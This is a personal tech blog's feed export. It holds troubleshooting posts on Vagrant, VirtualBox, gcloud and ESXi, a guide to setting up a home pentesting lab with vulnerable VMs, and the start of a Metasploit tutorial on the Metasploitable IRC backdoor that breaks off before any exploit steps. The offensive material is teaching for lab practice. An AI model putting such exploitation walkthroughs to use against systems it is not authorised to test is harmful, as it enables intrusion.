tag:blogger.com,1999:blog-41819395659769033822024-02-19T06:10:23.126-05:00HackavisionComputers, technology, and breaking things.
If you'd like to support the site, please disable adblock!Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comBlogger27125tag:blogger.com,1999:blog-4181939565976903382.post-11518506413921187312022-12-27T09:00:00.001-05:002022-12-27T09:00:00.171-05:00Vagrant "Fuse Device Not Found" Error Fix<p> You may come across this error while using Vagrant in WSL on Windows. It's very confusing and the Google results are not particularly helpful with fixing this specific error</p><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><div style="text-align: left;"><div>fuse: device not found, try 'modprobe fuse' first</div><div><br /></div><div>Cannot mount AppImage, please check your FUSE setup.</div><div>You might still be able to extract the contents of this AppImage</div><div>if you run it with the --appimage-extract option.</div><div>See https://github.com/AppImage/AppImageKit/wiki/FUSE</div><div>for more information</div><div>open dir error: No such file or directory</div></div></blockquote><p>The cause of this, at least at the time of writing, is that newer versions of Vagrant (specifically 2.2.19) is broken in (some) cases, and the solution is to use an older Vagrant version (specifically 2.2.6 works for me).</p><p>Download Links: https://releases.hashicorp.com/vagrant/2.2.6/ </p><p>Windows MSI: https://releases.hashicorp.com/vagrant/2.2.6/vagrant_2.2.6_x86_64.msi</p><p>Reference (my project): https://github.com/Marshall-Hallenbeck/red_team_attack_lab/blob/main/docs/windows_setup.md#fuse-device-not-found</p>Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-25812194401093762852022-12-26T09:00:00.000-05:002022-12-26T09:00:00.181-05:00Virtualbox VBoxManage startvm Error Fix<p> If you ever come across an error like this:</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><div style="text-align: left;"><div>There was an error while executing `VBoxManage`, a CLI used by Vagrant</div></div><div style="text-align: left;"><div>for controlling VirtualBox. The command and stderr is shown below.</div></div><div style="text-align: left;"><div><br /></div></div><div style="text-align: left;"><div>Command: ["startvm", "f71acfb8-5456-4fa3-85f8-e1a7d744f416", "--type", "gui"]</div></div><div style="text-align: left;"><div><br /></div></div><div style="text-align: left;"><div>Stderr: VBoxManage.exe: error: Failed to get device handle and/or partition ID for 0000000001688b80 (hPartitionDevice=0000000000000c29, Last=0xc0000002/1) (VERR_NEM_VM_CREATE_FAILED)</div></div><div style="text-align: left;"><div>VBoxManage.exe: error: Details: code E_FAIL (0x80004005), component ConsoleWrap, interface IConsole</div></div></blockquote><p>The cause is that Windows has weird virtualization (no surprise) and requires you to disable Hyper-V</p><p>Run these commands to do so (this will reboot!):</p><p></p><blockquote>bcdedit /set hypervisorlaunchtype off<br />DISM /Online /Disable-Feature:Microsoft-Hyper-V<br />reboot</blockquote><p></p>Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-38099092016249548542022-12-20T21:50:00.004-05:002022-12-20T21:50:37.414-05:00Google Cloud Authentication "activate-service-account" Problem Refreshing Auth Token<p><br /></p><p>I just ran into this issue when adding a Google cloud auth key via the command line threw out an error about the JWT token being invalid, even though it was just created.<br />The command I was running was:</p><blockquote><p>gcloud auth activate-service-account --key-file auth.json</p></blockquote><p>The error I was receiving was:</p><blockquote><p>ERROR: (gcloud.auth.activate-service-account) There was a problem refreshing your current auth tokens: ('invalid_grant: Invalid JWT: Token must be a short-lived token (60 minutes) and in a reasonable timeframe. Check your iat and exp values in the JWT claim.', {'error': 'invalid_grant', 'error_description': 'Invalid JWT: Token must be a short-lived token (60 minutes) and in a reasonable timeframe. Check your iat and exp values in the JWT claim.'})</p></blockquote><p>Which doesn't really tell you much, other than there's something wrong with the token.</p><p>HOWEVER, there isn't actually anything wrong with the token! <b>The issue was that the Linux VM I was on had its time messed up, causing it to be about 8 hours in the future!</b><br />Simply fixing my VM's clock caused it to start to work.</p><p>I didn't look into the details of how activate-service-account works, but I assume it's trying to request a JWT and then the token it requests or did request makes it freak out since the clock is skewed.</p><p>Anyway, I hope this helps someone when Googling this error. </p>Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-43560550398911863922022-12-16T16:12:00.005-05:002022-12-16T16:14:05.574-05:00Enable Copy Paste Globally in ESXi<p>If you are like me and constantly copy paste things between your host machine and VMs, but don't want to bother enabling copy paste each VM in your ESXi configuration, here's how you do it.</p><p>First, enable SSH access, connect to your ESXi host, and edit the "/etc/vmware/config" file</p><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><p style="text-align: left;"><span style="font-family: courier;">vi /etc/vmware/config</span></p></blockquote><p></p><p>Now add in the following lines:</p><p></p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><span style="font-family: courier;">vmx.fullpath = "/bin/vmx"<br /></span><span style="font-family: courier;">isolation.tools.copy.disable="FALSE"<br /></span><span style="font-family: courier;">isolation.tools.paste.disable="FALSE"<br /></span><span style="font-family: courier;">isolation.tools.setGUIOptions.enable="TRUE"</span></blockquote><p></p><p></p><p></p><p>To take effect right away, reboot the ESXi host.</p><p></p>Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-50179164743259971882013-05-15T22:22:00.001-04:002022-12-20T10:46:11.207-05:00How to Unfollow Blogs or "Reading List" on Google [Non-Technical]<div dir="ltr" style="text-align: left;" trbidi="on">
This is a very non-technical post, but I could not find ANY information about unfollowing blogs through Blogger without directly going to the blog and clicking a bunch (which from my point of view is INCREDIBLY annoying to say the least) so I thought it might help a few people out.<br />
<br />
I had this problem that I somehow had a ton of random blogs followed but didn't feel like going to 100+ blogs and unfollowing them individually. After a lot of searching I finally came across a very random post that would not intuitively come up via a search engine.<br />
<br />
<a name='more'></a>Blogger's help suggests to go here on the main page and select the settings wheel seen here:</div><div dir="ltr" style="text-align: left;" trbidi="on"><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw734rukFskM1O6c5ycgWGU7-8FauySbjyUKe4n7IIFhOHpKiRSdeRk4U9GQ363McP6LvxyGLDUn1ZXUDWvBZH3J88Hl_124x1H7fIqk7tr70iWt2UMVmNb8lgEKHVigk0nTrDZd2CZxE/s1600/Reading_List_Settings.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="58" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw734rukFskM1O6c5ycgWGU7-8FauySbjyUKe4n7IIFhOHpKiRSdeRk4U9GQ363McP6LvxyGLDUn1ZXUDWvBZH3J88Hl_124x1H7fIqk7tr70iWt2UMVmNb8lgEKHVigk0nTrDZd2CZxE/s320/Reading_List_Settings.PNG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>
The problem with this is there's a broken link (at least for me on all my browsers)...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg79wd60Y0OS13POOKTZv_hO5upgAMIkRxGD0qb0g_7OHSt1ZMqfvdwfIDm1OL-KVb0d3y9kkCb-Y79nQGdbdMEw569WFcVuFuCzkQSTjDKAUCoS5JUru3iWAEb8-EwM8MFgsL7y3X0XHE/s1600/Google_Terrible_Service.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="103" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg79wd60Y0OS13POOKTZv_hO5upgAMIkRxGD0qb0g_7OHSt1ZMqfvdwfIDm1OL-KVb0d3y9kkCb-Y79nQGdbdMEw569WFcVuFuCzkQSTjDKAUCoS5JUru3iWAEb8-EwM8MFgsL7y3X0XHE/w512-h103/Google_Terrible_Service.PNG" width="512" /></a></div><div dir="ltr" style="text-align: left;" trbidi="on"><br /></div>
Well, I finally found a fix for this stupidity and it's really simple. Go to <a href="http://www.google.com/reader/settings">http://www.google.com/reader/settings</a> and then the "Subscriptions" tab, then select the blogs and hit "Unsubscribe".<br />
<br />
Bam, done. Took way too long for me to find that, which I don't think is my fault (who looks under reader settings when it's through Blogger?).<br />
<br />
Also, please fix the "Reading list" error -- it's been like this for months.</div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-36856734807993449672013-04-16T19:59:00.001-04:002023-01-06T10:38:04.278-05:00[2013 Version] Starting a Pentesting Lab [How-To/Linux/Windows]<div dir="ltr" style="text-align: left;" trbidi="on">
Recently I bought a gaming computer with some of the best specs out there (i7, gtx670, 16gig ram, ssd, etc) and decided to finally set up my own Pentesting lab so I can practice breaking and securing "real" boxes of my own.<br />
<br />
My current setup consists of my router connected to my apartment's WAN using DHCP, which issues private DHCP leases to the connected boxes on my network. I have a Windows 7 laptop of my own, a Windows 7 desktop host machine running VMs, and a Ubuntu 12.10 server for all my main Linux needs (I have SSH set up so I can access this box from work and other places).<br />
My friends also connect to this network via Wifi, so there are random Win7 and OSx computers connected to it.<br />
As for my virtualized boxes, I have Windows XP (different SPs), Windows Server 2003, 2008, and 2012, Metasploitable 2, DVL (Damn Vulnerable Linux), BackTrack5R3 (I hack from this box), and a few other exploitable machines. I will be setting up a Windows Vista and a couple other *nix distros to exploit, as well.<br />
<br />
<a name='more'></a><br />
I am using <a href="http://www.vmware.com/products/workstation/" target="_blank">VMWare Workstation</a>, which is provided to me for free through my University and our <a href="https://www.dreamspark.com/" target="_blank">MSDNAA </a>agreement. For those who do not have access to such great tools, you can use the free version <a href="http://www.vmware.com/products/player/" target="_blank">VMWare Player</a>, but be forewarned that certain options may be different. I apologize if there are any problems when following my guides using Player instead of Workstation, but I will do my best to remedy these.<br />
<h3 style="text-align: center;">
Getting Started</h3>
<div>
If you already have a VM loader or specifically a VMWare application installed, ignore the following instruction as they are for people who do not have a VM loader.</div>
<div>
<br /></div>
<div>
From the links below, download your flavor of VMWare you can use (if you are a student who has MSDNAA access, I highly suggest getting Workstation). If you do not like VMWare, there are also alternatives, but I suggest using VMWare as all my instructions will be using that.</div>
<div>
<br /></div>
<div>
<b>VM Applications:</b></div>
<div>
<ul style="text-align: left;">
<li><a href="http://www.vmware.com/products/workstation/" target="_blank">VMWare Workstation</a> - Requires Activation Key after 30 days</li>
<li><a href="http://www.vmware.com/products/player/" target="_blank">VMWare Player</a> - Free</li>
<li><a href="https://www.virtualbox.org/wiki/Downloads" target="_blank">VirtualBox </a>- Free (Download links for Windows, OSx, and Linux)</li>
<li><a href="http://www.parallels.com/" target="_blank">Parallels </a>- Costs Money; For OSx</li>
<li><a href="http://wiki.qemu.org/Main_Page" target="_blank">QEMU</a> - Free; For Linux</li>
<li><a href="http://www.microsoft.com/windows/virtual-pc/" target="_blank">Virtual PC</a> - Free; For running XP (honestly just use one of the above, but to each their own)</li>
</ul>
<div>
Once you have installed the VM application, we can start by collecting vulnerable VMs and the sort.</div>
</div>
<div>
<br /></div>
<h3 style="text-align: center;">
Collecting Vulnerable VMs</h3>
<div>
This may require a decent amount of hard disk space, so I would suggest making sure you have enough to download and keep the drives on your disk. I have a few separate, cheap 7200rpm WD's from 250-500gigs specifically for downloading and running VMs off of.</div>
<div>
<br /></div>
<div>
<b>Below is a list of exploitable and vulnerable VMs/ISOs(updated 10/29/12):</b><br />
<br />
<a href="http://sourceforge.net/projects/metasploitable/files/Metasploitable2/" target="_blank">Metasploitable 2</a> - Probably the best VM to use. Complete vulnerable VM with services set up for everything. Most of my tutorials will start with exploiting this.<br />
<u>Damn Vulnerable Linux 1.5</u> - Discontinued, but I have the ISO. I will upload it *somewhere* when I'm home. Either directly through this site or on a sharing site (you could torrent, but I want all the download to be able to be directly downloaded).<br />
<a href="http://sourceforge.net/projects/lampsecurity/" target="_blank">LAMP Security Training</a> - LAMP stands for Linux Apache MySQL PHP, and this version is for the security testing of those.<br />
<a href="http://sourceforge.net/projects/owaspbwa/files/" target="_blank">Open Web Application Security Project (OWASP) Broken Web Applications Project</a> - Self Explanatory; OWASP's Broken Web App Project!<br />
<br />
<b>Below is a list of VMs and ISOs that you can configure yourself:</b><br />
<br />
<a href="http://ronaldbradford.com/blog/ultimatelamp-2006-05-19/" target="_blank">UltimateLAMP</a> - Scroll down for the download link; a complete LAMP (Linux, Apache, MySQL, PHP) distro.<br />
<br />
<b>Below is a list of VMs and ISOs to hack <i>from:</i></b><br />
<b><i><br /></i></b>
<strike><a href="http://www.backtrack-linux.org/downloads/" target="_blank">BackTrack5R3</a> - I use the Gnome 32bit VM one and just load it into my VMWare; all of my tutorials will be from Ubuntu 12.04 LTS, or BT5R3 (which is Ubuntu, as well).</strike> <b>BackTrack has been replaced by the following: <a href="http://www.kali.org/downloads/" target="_blank">Kali Linux</a></b><br />
<a href="http://www.backbox.org/downloads" target="_blank">BackBox</a> - Another Ubuntu based Pentesting distro<br />
<a href="http://www.blackbuntu.com/download" target="_blank">BlackBuntu</a> - Yet another Ubuntu based Pentesting distro<br />
<br />
<h3 style="text-align: center;">
Creating Your Pentesting Network</h3>
</div>
<div>
Now that we have a host machine with a virtual machine application (I suggest VMWare), it's time to set up your network so you can see all your exploitable (and maybe non exploitable) VMs!<br />
<br />
For the machines that are already built for VM usage (aka they're VMDK and not ISO), just double click the .VMX file which is the configuration file for the virtual machine, and it will automatically open with the configured VM software.<br />
<br />
For the machines that you downloaded in ISO format, we have to add them into our VM software. Below I will show you how to do so in VMWare Workstation (though I believe the free version of VMWare is the same).<br />
<h4 style="text-align: center;">
Creating a Virtual Machine from an ISO</h4>
</div>
<div>
Now we'll be loading Ubuntu Server 12.04.1 LTS (Long Time Support) since it is a good operating system to mess around with and learn Linux on. Most if not all other ISO installations will be just as easy as this one.<br />
<br />
To start, open VMware Workstation. Mine looks like the following, but yours will have no VMs added/opened.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a data-darkreader-inline-bgcolor="" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvrXjLq_GaFZQRDGu3Rn0yfHIN9BT0GBRdeqWrMTNVvyXY70GqlVr7J4TeGqAiKEO3S6GWI5xapmFpKVubdCNmbWVtW5Zb2IjpLqd6zix1z462PoUzsy7CeaE0Nc-EdUXubVSxbR1dun8/s1600/1+-+VMware+Workstation+Screenshot.PNG" imageanchor="1" style="background-color: black; margin-left: auto; margin-right: auto;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvrXjLq_GaFZQRDGu3Rn0yfHIN9BT0GBRdeqWrMTNVvyXY70GqlVr7J4TeGqAiKEO3S6GWI5xapmFpKVubdCNmbWVtW5Zb2IjpLqd6zix1z462PoUzsy7CeaE0Nc-EdUXubVSxbR1dun8/s400/1+-+VMware+Workstation+Screenshot.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">When I load up my VMware Workstation; basic view</td></tr>
</tbody></table>
To add a new virtual machine, from the upper left "File" drop down, select "New Virtual Machine".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpQ3i1t2MwAVNQKQ9l6cyQrWkwYFwKtbOXCMELaiT0xEv_qcj9lg1V7zb3al2zw2UcDZWsGwLYPzjLLVsFduj6qA3X7ew-l70JvIdjDf-BQlSt6nkRNRANl1OXKhWkGNZmwv2ApKEAqeM/s1600/2+-+New+Virtual+Machine.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="361" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpQ3i1t2MwAVNQKQ9l6cyQrWkwYFwKtbOXCMELaiT0xEv_qcj9lg1V7zb3al2zw2UcDZWsGwLYPzjLLVsFduj6qA3X7ew-l70JvIdjDf-BQlSt6nkRNRANl1OXKhWkGNZmwv2ApKEAqeM/s400/2+-+New+Virtual+Machine.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
We are going to select "Typical" which is the recommended setting. For most if not all VMs you will be using in your lab you can just select the typical settings. Hit next to continue to the next part which we will be...<br />
<br />
Selecting the installer disk image, or the ISO file that you have previously downloaded at the above or an alternative link.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNmxVaR4vaXYZ7_RzXajWxCvZgoB1tLNFzfyKeWDphQdFDWoT2lkrkRGMfirfVX1Vn_aKDRDYhHS3_EqGGzz4BtZa2V5bcP7faTS7JTSMt_fDoFBRQFiJYGerDW6vBMS4cE0IjY5UOHqE/s1600/3+-+Guest+OS+Install+1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="363" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNmxVaR4vaXYZ7_RzXajWxCvZgoB1tLNFzfyKeWDphQdFDWoT2lkrkRGMfirfVX1Vn_aKDRDYhHS3_EqGGzz4BtZa2V5bcP7faTS7JTSMt_fDoFBRQFiJYGerDW6vBMS4cE0IjY5UOHqE/s400/3+-+Guest+OS+Install+1.PNG" width="400" /></a></div>
<br />
Click on browse and locate the ISO you wish to install. We are using our Ubuntu 12.04.1, but we have many others to choose from as you can see.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBhJofLs9JTLKzqccQN9VvSuAJzSYeWKeGrG2z79Z__dBvdlsQ6Yb2Dfp9wi7NP31UqJ6eRdS564gWUyQ6lTvsqBBe91YlhkqjPSqhj0wLoc62dQdRezXGwYc6hBIfWoB7LepJu4xFPNQ/s1600/4+-+Selecting+OS+ISO.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBhJofLs9JTLKzqccQN9VvSuAJzSYeWKeGrG2z79Z__dBvdlsQ6Yb2Dfp9wi7NP31UqJ6eRdS564gWUyQ6lTvsqBBe91YlhkqjPSqhj0wLoc62dQdRezXGwYc6hBIfWoB7LepJu4xFPNQ/s400/4+-+Selecting+OS+ISO.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Once you select the correct ISO and hit next, it will prompt for some "Easy Install Information" since it recognizes that we are installing Ubuntu 64-bit.<br />
For these settings, just enter what you want, but keep in mind the username cannot have capitals, and a password is required (I usually just do my first name with "test" or something lame).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj197vM19gOGUV32UUnBmBRzlIjAGwY6WbF29QGSKbs_gwqlxGOkgiPp8xKguKt2LVFvvP043d0_nP-Q3yuaVfcJ1vQDQGdrIC6NHjVlMOyCZPh3heRoAe3L4dJPS-MfY-e2p3yhglCsSk/s1600/5+-+Easy+Install+Ubuntu+Personalize.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="361" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj197vM19gOGUV32UUnBmBRzlIjAGwY6WbF29QGSKbs_gwqlxGOkgiPp8xKguKt2LVFvvP043d0_nP-Q3yuaVfcJ1vQDQGdrIC6NHjVlMOyCZPh3heRoAe3L4dJPS-MfY-e2p3yhglCsSk/s400/5+-+Easy+Install+Ubuntu+Personalize.PNG" width="400" /></a></div>
<br />
After you have done this, hit next as normal.<br />
This part is where you will be selecting what you wish to name your VM, and where you want to store your disk files.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqQCd3qvLxZZTyixzdePvffizhosiNk2VuJFsoX2AJTf02k-5v69w9y6ofExqFq58Vk_9K9r1j1sfnpoABWHj2pmNHfOM8Fv1oPSyuLEl96XKn1znjZXDz1Ik-qNh7kop4YBd_88NVI8I/s1600/6+-+Name+Virtual+Machine.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqQCd3qvLxZZTyixzdePvffizhosiNk2VuJFsoX2AJTf02k-5v69w9y6ofExqFq58Vk_9K9r1j1sfnpoABWHj2pmNHfOM8Fv1oPSyuLEl96XKn1znjZXDz1Ik-qNh7kop4YBd_88NVI8I/s400/6+-+Name+Virtual+Machine.PNG" width="400" /></a></div>
<br />
This part is important because you cannot have two of the same name (duh), and because if you store all your VMs together, as they become larger there needs to be sufficient disk space on the drive you are saving them to.<br />
Name each of your Virtual Machines so you can tell them apart. Some of mine have specific names (like Metasploitable2) and some have just the distro name if its generic (like Ubuntu 12.04 LTS).<br />
<br />
The next step is the size of the virtual disk you will be creating for this VM. It is very important to make it large enough so that if you use it often (installing applications/writing programs/etc) it will not fill up, but not too large that you're wasting space. <b>Note that the files become larger as you use the space, so you can overshoot a bit for this.</b><br />
<br />
For our Ubuntu I'm just going to put it to 8gigs since I'll probably be deleting it (I already have a few Ubuntus spun up).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheC0oIWZkfMrtF_1OsvRRaLo4E8khLb0ZATGdIlSSd0q3NRoOmaSMDZjRdEEe5uzyXxTwPWyRdkru3OyW1LFBTGuRVFwoWuDNY3Kfn1yvhS6XurcoaLeTbT2Eli4hslkMJbEks-C6i1W4/s435/10+-+Size+of+VM.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="365" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheC0oIWZkfMrtF_1OsvRRaLo4E8khLb0ZATGdIlSSd0q3NRoOmaSMDZjRdEEe5uzyXxTwPWyRdkru3OyW1LFBTGuRVFwoWuDNY3Kfn1yvhS6XurcoaLeTbT2Eli4hslkMJbEks-C6i1W4/s400/10+-+Size+of+VM.PNG" width="400" /></a></div>
<br />
After clicking next, this screen shows the brief overview of what we have selected. There is also a "customize hardware" button which we will be utilizing so we do not have to change it after the creation.<br />
<b>Note: We will be changing the virtual adapter (NIC - Network Interface Card) from NAT to Bridged, so if you want NAT, ignore this section.</b><br />
<b>A bridged connection means that the VM will connect directly to your network like another computer through your NIC (aka it will have its own IP through DHCP/etc). </b><br />
<b>The default is NAT which means that the computer is essentially the router to your VM.</b><br />
<b>It all depends on what you want, but I like bridged.</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgeYwW-9SGCGfflS83iGDKcYKTuLSTMwBD-XMibOZdMvyEII6Jad26dSYPRqRfK_0tfKaXD9HU1Na0swnkJ8XA3X4JB2gmGrk2VeYZtchRxFS9CQO5E-kcDuh0cGZfOtBr3s_Nb4epCho/s432/11+-+Review+Screen.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="363" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgeYwW-9SGCGfflS83iGDKcYKTuLSTMwBD-XMibOZdMvyEII6Jad26dSYPRqRfK_0tfKaXD9HU1Na0swnkJ8XA3X4JB2gmGrk2VeYZtchRxFS9CQO5E-kcDuh0cGZfOtBr3s_Nb4epCho/s400/11+-+Review+Screen.PNG" width="400" /></a></div>
<br />
Go ahead and click the <i>Customize Hardware...</i> button so we can change a few options.<br />
You will be presented with the following screen:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiMQRDL6RBzrV-NIs1kOJJK2F7WCnMiHAzv8MrK_M-e16_SHGlwj5L7CNJP9Jp-2974dni8PluZHmSsutrarw4a3a0m_GyvxDegE4W5Cc02OS7UL6GRSF0DO51_4GPND4gyiagTJGsRJg/s660/12+-+Customize+Hardware+Main+Screen.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiMQRDL6RBzrV-NIs1kOJJK2F7WCnMiHAzv8MrK_M-e16_SHGlwj5L7CNJP9Jp-2974dni8PluZHmSsutrarw4a3a0m_GyvxDegE4W5Cc02OS7UL6GRSF0DO51_4GPND4gyiagTJGsRJg/s400/12+-+Customize+Hardware+Main+Screen.PNG" width="400" /></a></div>
<br />
The memory is of course the RAM for our virtual machine. I will be leaving this at 1gig, but you can jack it up depending on what you want.<br />
<b>Note that for VMs, it is up to you to choose how much RAM to give it. Certain pre-built VMs like Metasploitable only require a small amount, but others like Windows require more.</b><br />
<b><br /></b>
Like I said before, we are only changing the Network Adapter settings from NAT to bridged. Click on the "<i>Network Adapter</i>" selection under the <i>Devices </i>or click "<i>Add...</i>" if one is not there.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGXBWH-aOAjnDFzUQE05Kx6JpcKPUwweAHlfU_5YpMoD13ato-uc1mgrZNIYhfKsCpwj3m6OoD9Q77QslxBU0-PgBOCfTYEwrPCOE92eU4VPjFxnICMyqHRgiv-T3p6uokMUl7xJKGvgQ/s651/13+-+Bridged+Network+Adapter.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="342" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGXBWH-aOAjnDFzUQE05Kx6JpcKPUwweAHlfU_5YpMoD13ato-uc1mgrZNIYhfKsCpwj3m6OoD9Q77QslxBU0-PgBOCfTYEwrPCOE92eU4VPjFxnICMyqHRgiv-T3p6uokMUl7xJKGvgQ/s400/13+-+Bridged+Network+Adapter.PNG" width="400" /></a></div>
<br />
After this is finished, just click "<i>Close</i>" and "<i>Finished</i>" on the following screen, and your VM should start to boot.<br />
Ubuntu will go through some checks, copy some files, and install on the virtual disk.<br />
Finally it will present you with the login screen (I hope you remembered your credentials).<br />
<br />
This method can be used on almost any .iso to install it (any that I've seen); however like I said before, some hacking/vulnerable distros come in a pre-packaged VM like Kali or previously BackTrack.</div>
</div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-78562081879037323862012-11-04T22:47:00.002-05:002022-12-20T10:46:15.917-05:00Hacking Metasploitable #1: Introduction & IRC Hack [Metasploit/Linux/Exploit/How-to]<div dir="ltr" style="text-align: left;" trbidi="on">
Starting today, I will start releasing how-tos on hacking the Metasploitable distro of Linux released by the creators of Metasploit in which I will go through how to determine if a system is exploitable, how to use Metasploit, how to load modules and run exploits, and what to do once you have exploited a system.<br />
<div>
<br /></div>
<div>
I hope these posts, starting with this (#1), teach the readers the important parts of using Metasploit as well as the basics of Pentesting and exploitation. This is by no means a thorough series on exploitation, but a way to get basic users' hands wet in the world of exploitation and hacking.</div>
<div>
<a name='more'></a>Before we begin, I assume you have Metasploitable installed on VM or host box (I suggest a VM), Metasploit installed on a system (BT5R3 has it automatically installed, which I will be using for this), and a basic understanding on how to use a computer. If you do not have these, please see the linked how-tos or research more upon these topics. Let's begin.</div>
<div>
<br /></div>
<div>
To first understand the basics of this exploit, reading the Vulnerability Summary for CVE-2010-2075 (CVE stands for Common Vulnerabilities and Exposures) which can be read <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2075" target="_blank">here</a>. Summaries of exploits are commonly released and reviewed by the US government and other large security companies and can be <a href="http://web.nvd.nist.gov/view/vuln/search?execution=e2s1" target="_blank">searched</a> for through <a href="http://www.exploit-db.com/" target="_blank">many sites</a> which <a href="http://osvdb.org/search/advsearch" target="_blank">are useful</a> for understanding exploits and staying relevant in the security industry.</div>
<div>
<br /></div>
<div>
If you have read the exploit summary, you should have <i>some</i> understanding on how this exploit came to be and why it is dangerous. Backdoors like this are sometimes secretly hidden in software and take a while to come out, leading to scary exploits like this that allow root access quite easily. Now that we've discussed the exploit briefly, lets go over how we find a vulnerable machine and exploit it.</div>
<div>
<br /></div>
<div>
To open Metasploit, run the command:</div>
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">msfconsole</span></blockquote>
<span style="font-family: inherit;">It may take a while to open or spit a warning back at you saying that you need to chmod or run as root. If you're not running BT5R3 as default root, then you need to run msfconsole with sudo and enter your sudo password to load it up.</span> If you receive this warning ctrl-c out of it and run<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">sudo msfconsole</span></blockquote>
I receive the following:<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">root@bt:~# msfconsole<br /># cowsay++<br /> ____________<br />< metasploit ><br /> ------------</span></blockquote>
<blockquote class="tr_bq">
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;"> \ ,__,</span></blockquote>
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;"> \ (oo)____</span></blockquote>
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;"> (__) )\</span></blockquote>
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;"> ||--|| *</span></blockquote>
</blockquote>
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">=[ metasploit v4.5.0-dev [core:4.5 api:1.0]<br />+ -- --=[ 978 exploits - 523 auxiliary - 160 post<br />+ -- --=[ 262 payloads - 28 encoders - 8 nops<br />msf ></span></blockquote>
Whenever you start up Metasploit, there is a cute little banner which is sometimes an animal saying "metasploit" or an astroids based ASCII art. Regardless of what you see there, the important stuff is below.<br />
